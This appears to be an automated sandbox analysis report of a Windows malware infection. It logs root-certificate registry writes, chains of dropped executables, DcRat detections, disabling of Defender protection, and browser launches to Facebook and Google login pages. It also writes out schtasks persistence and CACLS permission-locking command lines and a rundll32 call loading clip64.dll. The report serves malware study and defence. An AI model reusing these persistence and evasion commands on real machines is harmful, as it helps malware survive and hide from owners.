19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2920 3sO43CV.exe 2920 3sO43CV.exe 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1204 Explorer.EXE -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 468 Process not Found 468 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2920 3sO43CV.exe 1620 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1980 8866.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2496 K.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2960 powershell.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1656 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeImpersonatePrivilege 1656 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeShutdownPrivilege 2404 conhost.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeShutdownPrivilege 548 DllHost.exe Token: SeShutdownPrivilege 2024 conhost.exe Token: SeShutdownPrivilege 2180 powercfg.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2040 powershell.EXE Token: SeSystemEnvironmentPrivilege 2688 csrss.exe Token: SeDebugPrivilege 1656 jsc.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 564 powershell.exe Token: SeShutdownPrivilege 2552 powercfg.exe Token: SeShutdownPrivilege 2288 powercfg.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeShutdownPrivilege 1508 powercfg.exe Token: SeShutdownPrivilege 2956 powercfg.exe Token: SeDebugPrivilege 2528 powershell.EXE Token: SeDebugPrivilege 1940 updater.exe Token: SeLockMemoryPrivilege 2868 explorer.exe Token: SeSecurityPrivilege 2236 sc.exe Token: SeSecurityPrivilege 2236 sc.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 1204 Explorer.EXE 1204 Explorer.EXE 1952 iexplore.exe 1952 iexplore.exe 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1952 iexplore.exe 1952 iexplore.exe 1952 iexplore.exe 1952 iexplore.exe 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE 2276 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2708 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2500 1204 Explorer.EXE 31 PID 1204 wrote to memory of 2500 1204 Explorer.EXE 31 PID 1204 wrote to memory of 2500 1204 Explorer.EXE 31 PID 1204 wrote to memory of 2500 1204 Explorer.EXE 31 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 2708 wrote to memory of 2660 2708 80D3.exe 33 PID 1204 wrote to memory of 2560 1204 Explorer.EXE 34 PID 1204 wrote to memory of 2560 1204 Explorer.EXE 34 PID 1204 wrote to memory of 2560 1204 Explorer.EXE 34 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 2660 wrote to memory of 2308 2660 Rl0Uz9HJ.exe 36 PID 1204 wrote to memory of 580 1204 Explorer.EXE 37 PID 1204 wrote to memory of 580 1204 Explorer.EXE 37 PID 1204 wrote to memory of 580 1204 Explorer.EXE 37 PID 1204 wrote to memory of 580 1204 Explorer.EXE 37 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 2308 wrote to memory of 964 2308 vk8qw0bZ.exe 38 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 964 wrote to memory of 1684 964 TM0pC3TM.exe 39 PID 1204 wrote to memory of 1980 1204 Explorer.EXE 40 PID 1204 wrote to memory of 1980 1204 Explorer.EXE 40 PID 1204 wrote to memory of 1980 1204 Explorer.EXE 40 PID 1204 wrote to memory of 1980 1204 Explorer.EXE 40 PID 2560 wrote to memory of 1952 2560 cmd.exe 41 PID 2560 wrote to memory of 1952 2560 cmd.exe 41 PID 2560 wrote to memory of 1952 2560 cmd.exe 41 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1684 wrote to memory of 1292 1684 YD6bx5XP.exe 42 PID 1204 wrote to memory of 1524 1204 Explorer.EXE 43 PID 1204 wrote to memory of 1524 1204 Explorer.EXE 43 PID 1204 wrote to memory of 1524 1204 Explorer.EXE 43 PID 1204 wrote to memory of 1524 1204 Explorer.EXE 43 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe"C:\Users\Admin\AppData\Local\Temp\3sO43CV.exe"2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2920
-
-
C:\Users\Admin\AppData\Local\Temp\80D3.exeC:\Users\Admin\AppData\Local\Temp\80D3.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1292 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:2012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 2689⤵
- Program crash
PID:300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1528
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\82F6.exeC:\Users\Admin\AppData\Local\Temp\82F6.exe2⤵
- Executes dropped EXE
PID:2500
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\844F.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2276
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/3⤵PID:3064
-
-
-
C:\Users\Admin\AppData\Local\Temp\8568.exeC:\Users\Admin\AppData\Local\Temp\8568.exe2⤵
- Executes dropped EXE
PID:580
-
-
C:\Users\Admin\AppData\Local\Temp\8866.exeC:\Users\Admin\AppData\Local\Temp\8866.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\8AC7.exeC:\Users\Admin\AppData\Local\Temp\8AC7.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"3⤵
- Executes dropped EXE
PID:2932 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F4⤵
- DcRat
- Creates scheduled task(s)
PID:1772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit4⤵PID:1680
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2900
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"5⤵PID:1660
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E5⤵PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:952
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"5⤵PID:636
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E5⤵PID:944
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
PID:2292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\12BC.exeC:\Users\Admin\AppData\Local\Temp\12BC.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:556 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
